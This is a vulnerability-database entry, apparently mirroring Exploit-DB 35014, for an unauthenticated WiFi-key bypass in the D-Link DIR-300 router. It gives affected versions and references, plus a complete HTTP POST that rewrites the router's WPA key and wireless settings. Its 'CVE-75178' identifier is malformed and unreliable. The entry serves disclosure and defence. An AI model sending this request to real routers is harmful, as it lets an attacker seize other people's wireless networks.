Sign-up

ID

VAR-E-201011-0256


EDB ID

35014


TITLE

D-Link DIR-300 - WiFi Key Security Bypass - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35014

DESCRIPTION

D-Link DIR-300 - WiFi Key Security Bypass. CVE-75178 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35014

AFFECTED PRODUCTS

vendor:d linkmodel:dir-300scope: - version: -

Trust: 1.0

vendor:d linkmodel:dir-300scope:eqversion:2.04

Trust: 0.3

vendor:d linkmodel:dir-300 2.01b1scope: - version: -

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:1.05

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:1.04

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:0

Trust: 0.3

sources: BID: 45038 // EXPLOIT-DB: 35014

EXPLOIT

source: https://www.securityfocus.com/bid/45038/info

The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.

Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks.

POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive

Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=

Trust: 1.0

sources: EXPLOIT-DB: 35014

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35014

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35014

TYPE

WiFi Key Security Bypass

Trust: 1.0

sources: EXPLOIT-DB: 35014

CREDITS

Gaurav Saha

Trust: 0.6

sources: EXPLOIT-DB: 35014

EXTERNAL IDS

db:BIDid:45038

Trust: 1.9

db:EXPLOIT-DBid:35014

Trust: 1.6

db:EDBNETid:56264

Trust: 0.6

sources: BID: 45038 // EXPLOIT-DB: 35014 // EDBNET: 56264

REFERENCES

url:https://www.securityfocus.com/bid/45038/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/35014/

Trust: 0.6

url:http://www.dlink.com/

Trust: 0.3

sources: BID: 45038 // EXPLOIT-DB: 35014 // EDBNET: 56264

SOURCES

db:BIDid:45038
db:EXPLOIT-DBid:35014
db:EDBNETid:56264

LAST UPDATE DATE

2022-07-27T09:57:03.316000+00:00


SOURCES UPDATE DATE

db:BIDid:45038date:2010-12-03T15:05:00

SOURCES RELEASE DATE

db:BIDid:45038date:2010-11-24T00:00:00
db:EXPLOIT-DBid:35014date:2010-11-24T00:00:00
db:EDBNETid:56264date:2010-11-24T00:00:00